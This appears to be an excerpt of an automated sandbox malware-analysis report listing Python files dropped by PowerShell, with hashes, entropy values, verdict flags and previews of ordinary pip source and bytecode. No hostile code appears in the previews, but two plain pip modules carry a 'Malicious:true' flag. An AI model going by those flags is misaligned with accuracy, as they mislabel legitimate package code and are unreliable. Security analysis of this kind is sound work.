                                                                                                                                                                                                                              Preview:""".shared options and groups..The principle here is to define options once, but *not* instantiate them.globally. One reason being that options with action='append' can carry state.between parses. pip parses general options twice internally, and shouldn't.pass on state. To be consistent, all options will follow this design.."""..# The following comment should be removed at some point in the future..# mypy: strict-optional=False..import importlib.util.import logging.import os.import textwrap.from functools import partial.from optparse import SUPPRESS_HELP, Option, OptionGroup, OptionParser, Values.from textwrap import dedent.from typing import Any, Callable, Dict, Optional, Tuple..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.cli.parser import ConfigOptionParser.from pip._internal.exceptions import CommandError.from pip._internal.locations import USER_CACHE_DIR, get_src_prefix.from pip._internal.models.format_control import FormatControl.from pip._interna
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):774
                                                                                                                                                                                                                              Entropy (8bit):4.442194812401173
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1oLbREYBpPMCt1AFirxUoail/vFFNbeHBIGULQ9j16rIw:11SdfAkruoaihGB/Mn
                                                                                                                                                                                                                              MD5:FD633C0517DC6329E5DE277A63617387
                                                                                                                                                                                                                              SHA1:07CFD732DC65402C9E687DD7871AD3DB39EE6B15
                                                                                                                                                                                                                              SHA-256:4478083F0B4E6E1E4A84CADDDD8653925F336D51BEE8E92697B61B157E04860D
                                                                                                                                                                                                                              SHA-512:72AAD99C07CCB624A077142590311CBAE5595371B01C42B43F927DA531A4EC0177660EB5AA3755E49914CEBF6C93F518EC38DFD77AF5D882AFF72FB8F220AD35
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from contextlib import ExitStack, contextmanager.from typing import ContextManager, Generator, TypeVar.._T = TypeVar("_T", covariant=True)...class CommandContextMixIn:. def __init__(self) -> None:. super().__init__(). self._in_main_context = False. self._main_context = ExitStack().. @contextmanager. def main_context(self) -> Generator[None, None, None]:. assert not self._in_main_context.. self._in_main_context = True. try:. with self._main_context:. yield. finally:. self._in_main_context = False.. def enter_context(self, context_provider: ContextManager[_T]) -> _T:. assert self._in_main_context.. return self._main_context.enter_context(context_provider).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2816
                                                                                                                                                                                                                              Entropy (8bit):4.631222880459271
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:CDcaHtIirrdVBUEkp+bWDW14CQhprf8ovXS9ehw3:QcaN/ndVTk4g9vXS9ee3
                                                                                                                                                                                                                              MD5:F13C5729899E294D836DAEA584FCC1FB
                                                                                                                                                                                                                              SHA1:29C984E2C04E7155594625FD38FED11FF25F2F97
                                                                                                                                                                                                                              SHA-256:533C6DFD80F5848BC1D405B99B1B7A215721B791BBD7602D32A768E7550C8664
                                                                                                                                                                                                                              SHA-512:0635260DA1631B1021BA535954AFFB2051E4331731809774D71FB48773A7F8A7193E86BE22B9110F1EE75BD220F98C6C4520B423D4E14590FEE80CB17A629ABB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""Primary application entrypoint..""".import locale.import logging.import os.import sys.import warnings.from typing import List, Optional..from pip._internal.cli.autocompletion import autocomplete.from pip._internal.cli.main_parser import parse_command.from pip._internal.commands import create_command.from pip._internal.exceptions import PipError.from pip._internal.utils import deprecation..logger = logging.getLogger(__name__)...# Do not import and use main() directly! Using it directly is actively.# discouraged by pip's maintainers. The name, location and behavior of.# this function is subject to change, so calling it directly is not.# portable across different pip versions...# In addition, running pip in-process is unsupported and unsafe. This is.# elaborated in detail at.# https://pip.pypa.io/en/stable/user_guide/#using-pip-from-your-program..# That document also provides suggestions that should work for nearly.# all users that are considering importing and using main() directly...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4338
                                                                                                                                                                                                                              Entropy (8bit):4.6104818344146725
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:XIEQNbYpHClCFLMG7/MqbmxOrCl5OGZc77QKMgKZ1p9tYU/Ykh/6:8KSCFwW/lbmF5Okc77G1DF/X6
                                                                                                                                                                                                                              MD5:325F7776130FA6C623EF9806DD4BAD4E
                                                                                                                                                                                                                              SHA1:8A34EF596AE1821215CC580B3F5A441F668C07CD
                                                                                                                                                                                                                              SHA-256:95A0E9B2E04397A9327F2C29F5E30C03DB3CE237C7D932499FEBE62F4186F74C
                                                                                                                                                                                                                              SHA-512:B25F5E94E4A2546E28CEB0A184EBF1022CAE0FD5632B1EFBB6CF2E7B5F0EB673CB8DE918D547F431609F36B86917102BCCFFF9B6CDB761E3E6725CAFDCD9E7C5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""A single place for constructing and exposing the main parser."""..import os.import subprocess.import sys.from typing import List, Optional, Tuple..from pip._internal.build_env import get_runnable_pip.from pip._internal.cli import cmdoptions.from pip._internal.cli.parser import ConfigOptionParser, UpdatingDefaultsHelpFormatter.from pip._internal.commands import commands_dict, get_similar_commands.from pip._internal.exceptions import CommandError.from pip._internal.utils.misc import get_pip_version, get_prog..__all__ = ["create_main_parser", "parse_command"]...def create_main_parser() -> ConfigOptionParser:. """Creates and returns the main parser for pip's CLI""".. parser = ConfigOptionParser(. usage="\n%prog <command> [options]",. add_help_option=False,. formatter=UpdatingDefaultsHelpFormatter(),. name="global",. prog=get_prog(),. ). parser.disable_interspersed_args().. parser.version = get_pip_version().. # add the general options
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10781
                                                                                                                                                                                                                              Entropy (8bit):4.318968861581646
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:BgIr4m3DhxF6y8q27Oav+laaOIlR5W45IhzHt:BTr4unJqolaaOIlR5W4If
                                                                                                                                                                                                                              MD5:2D92E1E2C4AB5A570C15CF0CC5419E0F
                                                                                                                                                                                                                              SHA1:CB4A660CDF59F16B83FD61DECCD012A59F410849
                                                                                                                                                                                                                              SHA-256:296E82DFEEFEE04AD3341D137CB4CAC0E74771DFAA79F09E1A7ACEA04DABD114
                                                                                                                                                                                                                              SHA-512:FD1D0F162203671639DE4BF3E8576CFB61097124E26293F264E50B6159B3DC48FF8BA52C709EABC7993B2C9A754B0463EBF37D67B6A1363DE99684F8349E6A0A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""Base option parser setup"""..import logging.import optparse.import shutil.import sys.import textwrap.from contextlib import suppress.from typing import Any, Dict, Generator, List, Tuple..from pip._internal.cli.status_codes import UNKNOWN_ERROR.from pip._internal.configuration import Configuration, ConfigurationError.from pip._internal.utils.misc import redact_auth_from_url, strtobool..logger = logging.getLogger(__name__)...class PrettyHelpFormatter(optparse.IndentedHelpFormatter):. """A prettier/less verbose help formatter for optparse.""".. def __init__(self, *args: Any, **kwargs: Any) -> None:. # help position must be aligned with __init__.parseopts.description. kwargs["max_help_position"] = 30. kwargs["indent_increment"] = 1. kwargs["width"] = shutil.get_terminal_size()[0] - 2. super().__init__(*args, **kwargs).. def format_option_strings(self, option: optparse.Option) -> str:. return self._format_option_strings(option).. def
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1968
                                                                                                                                                                                                                              Entropy (8bit):4.602849014976683
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Olf7FE7NeXlfERqFqxKqojg3se92T0hseXvA:ONEilT2qiI
                                                                                                                                                                                                                              MD5:E4A507BFD0AE5BD9C3206DAE7216D78A
                                                                                                                                                                                                                              SHA1:30E4DD3AD41BC3E9CD91528634DFB7CB78DC606C
                                                                                                                                                                                                                              SHA-256:4A8E263E84A35E45E2487893CF3AAE1F7555C950FF9E35E51C9484C583D7028C
                                                                                                                                                                                                                              SHA-512:CD3CE803150B967D8D153598AAE4A6F3BB826CB8C1C4468B765D6964F924770689F12C3F56E557AAADDD62ACB5F64DEDCDCC8DE875ACF88C8DFAD229224432A6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import functools.from typing import Callable, Generator, Iterable, Iterator, Optional, Tuple..from pip._vendor.rich.progress import (. BarColumn,. DownloadColumn,. FileSizeColumn,. Progress,. ProgressColumn,. SpinnerColumn,. TextColumn,. TimeElapsedColumn,. TimeRemainingColumn,. TransferSpeedColumn,.)..from pip._internal.utils.logging import get_indentation..DownloadProgressRenderer = Callable[[Iterable[bytes]], Iterator[bytes]]...def _rich_progress_bar(. iterable: Iterable[bytes],. *,. bar_type: str,. size: int,.) -> Generator[bytes, None, None]:. assert bar_type == "on", "This should only be used in the default mode.".. if not size:. total = float("inf"). columns: Tuple[ProgressColumn, ...] = (. TextColumn("[progress.description]{task.description}"),. SpinnerColumn("line", speed=1.5),. FileSizeColumn(),. TransferSpeedColumn(),. TimeElapsedColumn(),. ). else:.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18369
                                                                                                                                                                                                                              Entropy (8bit):4.3903961495373585
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:g4z/MvJBmDtqUDl01v0j8rlkc+ELVOkwx5bx07Xi/MxQJqXFilPm:dz/CJutqUyv9rWALVqmSkxQJqXoFm
                                                                                                                                                                                                                              MD5:21873B5DA9809D914BBD0ECABD9EF871
                                                                                                                                                                                                                              SHA1:C79B217F0D96FF7E53092C60087CFBD3DF00B73E
                                                                                                                                                                                                                              SHA-256:73BFD71C00675E60F7FEA94AF7EAF7ECAA9D28101C82654ABD0D96713ACD2DF7
                                                                                                                                                                                                                              SHA-512:F210EA2524F268D6E12C08734948A21B5CC9A7ED72878C434C6E751761DE88E71DFCD1B6407B2F497344E55E8507AB3ACFE640C065658348279E8A986222CADF
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""Contains the Command base classes that depend on PipSession...The classes in this module are in a separate module so the commands not.needing download / PackageFinder capability don't unnecessarily import the.PackageFinder machinery and all its vendored dependencies, etc.."""..import logging.import os.import sys.from functools import partial.from optparse import Values.from typing import TYPE_CHECKING, Any, List, Optional, Tuple..from pip._internal.cache import WheelCache.from pip._internal.cli import cmdoptions.from pip._internal.cli.base_command import Command.from pip._internal.cli.command_context import CommandContextMixIn.from pip._internal.exceptions import CommandError, PreviousBuildDirError.from pip._internal.index.collector import LinkCollector.from pip._internal.index.package_finder import PackageFinder.from pip._internal.models.selection_prefs import SelectionPreferences.from pip._internal.models.target_python import TargetPython.from pip._internal.network.session import
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5118
                                                                                                                                                                                                                              Entropy (8bit):4.58703070027322
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:lgLDVcjzzcBXb8Ia+tcTv5CmUg+SViiRFOFW9jfO:l5UBXwIa+tvFFazO
                                                                                                                                                                                                                              MD5:AEDC7E09E60737FEA30E38CC9C44AEA2
                                                                                                                                                                                                                              SHA1:ECFE25BB7FDE3149DC85FAC71F6E92F923C51C17
                                                                                                                                                                                                                              SHA-256:84827CDC67AB74580509DA1B200DB726081EB5E825FEE0B84A9E7CEA7CC56CF1
                                                                                                                                                                                                                              SHA-512:378783A484E69148C7C7C342BFF2D5C1D0C02359BAD460275C3F479EA0FF199C21BD1E0C2F7031207F878404E2C64EEE64274AE7A5D576C649A2689BCAB934C4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import contextlib.import itertools.import logging.import sys.import time.from typing import IO, Generator, Optional..from pip._internal.utils.compat import WINDOWS.from pip._internal.utils.logging import get_indentation..logger = logging.getLogger(__name__)...class SpinnerInterface:. def spin(self) -> None:. raise NotImplementedError().. def finish(self, final_status: str) -> None:. raise NotImplementedError()...class InteractiveSpinner(SpinnerInterface):. def __init__(. self,. message: str,. file: Optional[IO[str]] = None,. spin_chars: str = "-\\|/",. # Empirically, 8 updates/second looks nice. min_update_interval_seconds: float = 0.125,. ):. self._message = message. if file is None:. file = sys.stdout. self._file = file. self._rate_limiter = RateLimiter(min_update_interval_seconds). self._finished = False.. self._spin_cycle = itertools.cycle(spin_chars).. se
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):116
                                                                                                                                                                                                                              Entropy (8bit):4.403108176776916
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Bgnx4rJrL33xwGzJggFo19ZCcrMiy3S2IfUFGv:BgerlLV0AGh
                                                                                                                                                                                                                              MD5:C28210E327C369C51DC0B66A3E5C04B7
                                                                                                                                                                                                                              SHA1:0F5AF7B27D1A9EB30EFC1023917C7C50A76DD681
                                                                                                                                                                                                                              SHA-256:B0414751A5096EABFC880ACBDC702D733B5666618E157D358537AC4B2B43121D
                                                                                                                                                                                                                              SHA-512:A422BC5F1E1A8F56A9A30F73073137BFA30AC778241DABFF949FEFB85B2DE4722BEDFD7E8A0619C36F638DF15978F132A3C73258C0E7314EF1380EFB9020CB98
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:SUCCESS = 0.ERROR = 1.UNKNOWN_ERROR = 2.VIRTUALENV_NOT_FOUND = 3.PREVIOUS_BUILD_DIR_ERROR = 4.NO_MATCHES_FOUND = 23.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3882
                                                                                                                                                                                                                              Entropy (8bit):4.529678608886848
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:MJkFu2mY3pxma1z7Yg9u9RZ7jI3RWn8nvle8xXccxnkCq8ndAGbytc+MjXahr4:O21PmmHERhn8ntnY8n4dWQr4
                                                                                                                                                                                                                              MD5:11DFACD39208268EB7358CD0E15E938B
                                                                                                                                                                                                                              SHA1:22364BC467EDF6A02690DCD0A6A83086AA572238
                                                                                                                                                                                                                              SHA-256:E6844EF4EDDD336BC6BA1D1B170E0739595EB6BCABCF91C732698F5B026B1FD5
                                                                                                                                                                                                                              SHA-512:4A6C5F768469FA32292334404986FEBC741131612565FFADDFFE45388BF908A7749E090D402EDBAA0DF487C3AF767D8E12E251C1C0C07C1CC80C248A050DE01F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".Package containing all pip commands."""..import importlib.from collections import namedtuple.from typing import Any, Dict, Optional..from pip._internal.cli.base_command import Command..CommandInfo = namedtuple("CommandInfo", "module_path, class_name, summary")..# This dictionary does a bunch of heavy lifting for help output:.# - Enables avoiding additional (costly) imports for presenting `--help`..# - The ordering matters for help display..#.# Even though the module path starts with the same "pip._internal.commands".# prefix, the full path makes testing easier (specifically when modifying.# `commands_dict` in test setup / teardown)..commands_dict: Dict[str, CommandInfo] = {. "install": CommandInfo(. "pip._internal.commands.install",. "InstallCommand",. "Install packages.",. ),. "download": CommandInfo(. "pip._internal.commands.download",. "DownloadCommand",. "Download packages.",. ),. "uninstall": CommandInfo(. "pip._i
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3984
                                                                                                                                                                                                                              Entropy (8bit):5.811178251451463
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:0bZN3iIStQvL+458PBqdnE1Ny9gJDqxLr2Dfax7TGdZ+k9E3t8Rr8cPh4CxrTpR7:8viIStQD+pIEWKJDcr2WxkZ+kE3tmV
                                                                                                                                                                                                                              MD5:B0BA99DF976FFAA490F1C988F3A63899
                                                                                                                                                                                                                              SHA1:2643B0001D3651A0404CDC0DEA65E06AA017AF26
                                                                                                                                                                                                                              SHA-256:C1A674E036921A693217204B83FF31DA8DD8A8081A1917E4A659BD60E5A6AC7E
                                                                                                                                                                                                                              SHA-512:853CBA1C983BAEB3C3AA78869A8D4F773995422EA9A50DCF8E6F1B2107DF4B397ECF99C6CD5D62CC1F9F3451E9D62E8E1D14C523B8ECC1F9F76EF0261EF7EF8F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf*...............................U.d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d.........Z.i.d...e.d.d.d...........d...e.d.d.d...........d...e.d.d.d...........d...e.d.d.d...........d...e.d.d.d...........d...e.d.d.d...........d ..e.d!d"d#..........d$..e.d%d&d'..........d(..e.d)d*d+..........d,..e.d-d.d/..........d0..e.d1d2d3..........d4..e.d5d6d7..........d8..e.d9d:d;..........d<..e.d=d>d?..........d@..e.dAdBdC..........dD..e.dEdFdG..........dH..e.dIdJdK..........Z.e.e.e.f.....e.dL<...dMe.dNe.dOe.f.dP..Z.dMe.dOe.e.....f.dQ..Z.y.)Rz%.Package containing all pip commands......N)...namedtuple)...Any..Dict..Optional)...Command..CommandInfoz module_path, class_name, summary..installz.pip._internal.commands.install..InstallCommandz.Install packages...downloadz.pip._internal.commands.download..DownloadCommandz.Download packages...uninstallz pip._internal.commands.uninstall..UninstallCommandz.Uninstall packages...freezez.pip._internal.commands.freeze..FreezeCommandz1
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9693
                                                                                                                                                                                                                              Entropy (8bit):5.326875053421859
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:R+JNAKK0bHsaIelPNOqgeBJt5MCQwQ7H1T71j+xfLRzB4SeE99/g2mNBE/1Gq32/:RS+h0YaIuPtB+lS46P42mW2HJOxqh
                                                                                                                                                                                                                              MD5:398CD7D47F1D28FADBBD8955F40AFE8D
                                                                                                                                                                                                                              SHA1:EE250042710E37ECEEB87998CE7C9712186BC40C
                                                                                                                                                                                                                              SHA-256:255452BA01C2522979FAF0DBE08FE0ADFEAAB1FEC75A701B4D98B5A96FB06C05
                                                                                                                                                                                                                              SHA-512:BCF1932363CFEC72B443788C88E5967E4A92E571BB7FE1548187C71B79E7CAC2FADA50C91DF0DE12DE86B1C8FDC8E9ADEEE3BC7A7398BAC4842F9E6A66F4C960
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.e.........Z...G.d...d.e.........Z.y.)......N)...Values)...Any..List)...Command)...ERROR..SUCCESS)...CommandError..PipError)...filesystem)...getLoggerc.....................,.....e.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.e.d.e.e.....d.e.f.d...Z.d.e.d.e.e.....d.d.f.d...Z.d.e.d.e.e.....d.d.f.d...Z.d.e.d.e.e.....d.d.f.d...Z.d.e.e.....d.d.f.d...Z.d.e.e.....d.d.f.d...Z.d.e.d.e.e.....d.d.f.d...Z.d.e.d.e.e.....d.d.f.d...Z.d.e.d.e.d.e.f.d...Z.d.e.d.e.e.....f.d...Z.d.e.d.e.d.e.e.....f.d...Z.y.)...CacheCommandaw.... Inspect and manage pip's wheel cache... Subcommands:.. - dir: Show the cache directory.. - info: Show information about the cache.. - list: List filenames of packages stored in the cache.. - remove: Remove one or more package from the cache.. - purge: Remove all items from the cache... ``<pattern>`` can be a glob exp
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2072
                                                                                                                                                                                                                              Entropy (8bit):5.638134518005967
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:QEzvJy/6rmKUTPBjP95XmBx4oGmxkGFwnlJsv4TeRPP:RzhM6KKsT95ExymxPFcvsvdn
                                                                                                                                                                                                                              MD5:B51DBD1CBD2BEF774A09AF3D2208AA43
                                                                                                                                                                                                                              SHA1:D49A2154C48CBF6D5A8FBBE692DFDED3F9FB41A7
                                                                                                                                                                                                                              SHA-256:42E6FFE5718B13143D16EBFE5A3ECF90A24426C7837E597D84D6DC6F11F8D530
                                                                                                                                                                                                                              SHA-512:6802259B533A7BEA1E9067C0E0F93883C16270D3014414539EC703A7AF84BC6AAA08CDCF38721E1097663B8E7C02E80823B2880774E17AF70B019489049E2EF7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.j ..................e.........Z...G.d...d.e.........Z.y.)......N)...Values)...List)...Command)...ERROR..SUCCESS)...check_package_set.!create_package_set_from_installed.#warn_legacy_versions_and_specifiers)...write_outputc...........................e.Z.d.Z.d.Z.d.Z.d.e.d.e.e.....d.e.f.d...Z.y.)...CheckCommandz7Verify installed packages have compatible dependencies.z.. %prog [options]..options..args..returnc.....................R.....t.................\...}.}.t.........|...........t.........|.........\...}.}.|.D.],..}.|.|.....j...................}.|.|.....D.]...}.t.........d.|.|.|.d.......................|.D.]/..}.|.|.....j...................}.|.|.....D.]...\...}.}.}.t.........d.|.|.|.|.|................1..|.s.|.s.|.r.t.........S.t.........d...........t.........S.).Nz*%s %s requires %s, which is not installed.r....z-%s %s has requirement %s, but
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5174
                                                                                                                                                                                                                              Entropy (8bit):5.481760045976308
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:JKWZnCbrqJtozUoa+UPGG/ViVXG7x8Z1ynIB:wkCbrq72UoarP1VxC1yY
                                                                                                                                                                                                                              MD5:2A3329D9141DEBEE11B0AD82214D816E
                                                                                                                                                                                                                              SHA1:65F72AD74BC947BD4650474EF6B363EF7BBADB85
                                                                                                                                                                                                                              SHA-256:D3E182582DC52107815F5BA1FA15A9C95C14C1024219A82BE779FDBDD961F5E4
                                                                                                                                                                                                                              SHA-512:A942493562263DE2FE495703F2DD9A871ABE0CEF0E26D49669A731DC19FD7F707DBF77FF706EA2C56EE9B1B55809B432DE4C3082541EB7D8F2B06A522F01E220
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf..........................x.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.d.d.d.d...Z...G.d...d.e.........Z.y.)......N)...Values)...List)...Command)...SUCCESS)...get_progzD.# pip {shell} completion start{script}# pip {shell} completion end.a..... _pip_completion(). {{. COMPREPLY=( $( COMP_WORDS="${{COMP_WORDS[*]}}" \. COMP_CWORD=$COMP_CWORD \. PIP_AUTO_COMPLETE=1 $1 2>/dev/null ) ). }}. complete -o default -F _pip_completion {prog}. a..... #compdef -P pip[0-9.]#. __pip() {{. compadd $( COMP_WORDS="$words[*]" \. COMP_CWORD=$((CURRENT-1)) \. PIP_AUTO_COMPLETE=1 $words[1] 2>/dev/null ). }}. if [[ $zsh_eval_context[-1] == loadautofunc ]]; then. # autoload from fpath, call function directly. __pip "$@". else. # eval/source/. command, regi
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13194
                                                                                                                                                                                                                              Entropy (8bit):5.4154147389003695
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:jgWfPmvQwIc5P9IitqaER9fSaafZZVtF/1wsNGpC6Hw:jgWmoKI9aER4rfZZR//gC6Hw
                                                                                                                                                                                                                              MD5:D73AE77BE5675DA9970348067B53F80D
                                                                                                                                                                                                                              SHA1:F9BDF10D940A306F3C878DCEBF1810F210444937
                                                                                                                                                                                                                              SHA-256:7184ABF0E2610AAE6A7F1CAF6FA6AE08540774A002E5C91A6F1026ACF6331BBC
                                                                                                                                                                                                                              SHA-512:2519566A4F7E937292045E510E1A7BDCB19944441A36F462850CFA2BDC4EF75570B29CE7229E60FBE943E2F0220E10A57E46559638DF6ABDE251AB1048FD99B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf&&..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....e.j4..................e.........Z...G.d...d.e.........Z.y.)......N)...Values)...Any..List..Optional)...Command)...ERROR..SUCCESS)...Configuration..Kind..get_configuration_files..kinds)...PipError)...indent_log)...get_prog..write_outputc.....................>.....e.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.e.d.e.e.....d.e.f.d...Z.d.e.d.e.d.e.e.....f.d...Z.d.e.d.e.e.....d.d.f.d...Z.d.e.d.e.e.....d.d.f.d...Z.d.e.d.e.e.....d.d.f.d...Z.d.e.d.e.e.....d.d.f.d...Z.d.e.d.e.e.....d.d.f.d...Z.d.e.d.d.f.d...Z.d.d...Z.d.e.d.e.e.....d.d.f.d...Z.d.e.e.....d.e.d.e.d.e.f.d...Z.d.d...Z.d.e.d.e.f.d...Z.y.)...ConfigurationCommanda..... Manage local and global configuration... Subcommands:.. - list: List the active configuration (or from the file specified). - edit: Edit the configuration file in an editor. - get:
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10143
                                                                                                                                                                                                                              Entropy (8bit):5.343147540681008
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:JCwms5unYii4Sitsz33JCK+YvG0GIfK0QTaXMklbwTXGeadQh97B:lms5uYkFtsznJCK+YvcrTYlbwCXdQh9N
                                                                                                                                                                                                                              MD5:4994DCDC7D25AE719D39AFB949DED7F1
                                                                                                                                                                                                                              SHA1:2674A0B446F583FD392E35688C6DD0E7F3C72C68
                                                                                                                                                                                                                              SHA-256:21427E8A0B12D05B98C6BEFEA6CE4B9FDDE531FE1A9F5B890BEFA608CBB37BD2
                                                                                                                                                                                                                              SHA-512:56C67DED97A9F74CADB197550C2C00D55238DBC175CCC7C81FB239E24308544EC09E4A516844DF2E06A5DAAC7E6BA295C78D7FD83DF80929B4276F0EEF81D242
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfy..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..d.d.l$m%Z%....e.jL..................e'........Z(d.e)d.e.d.d.f.d...Z*d!d...Z+d.e.e)e)f.....f.d...Z,d.e)d.e.e.....f.d...Z-d.e)d.e.e)....f.d...Z.d.e.e)e)f.....d.d.f.d...Z/d!d...Z0d.e.d.d.f.d...Z1d.e.d.e)f.d...Z2..G.d...d e.........Z3y.)".....N)...Values)...ModuleType)...Any..Dict..List..Optional)...where)...parse)...cmdoptions)...Command)...make_target_python)...SUCCESS)...Configuration)...get_environment)...indent_log)...get_pip_version..name..value..returnc.....................2.....t.........j...................d.|.|...........y.).Nz.%s: %s)...logger..info).r....r....s.... .MC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/commands/debug.py..show_valuer........s..........K.K...$....&.....c..........................t.........j....
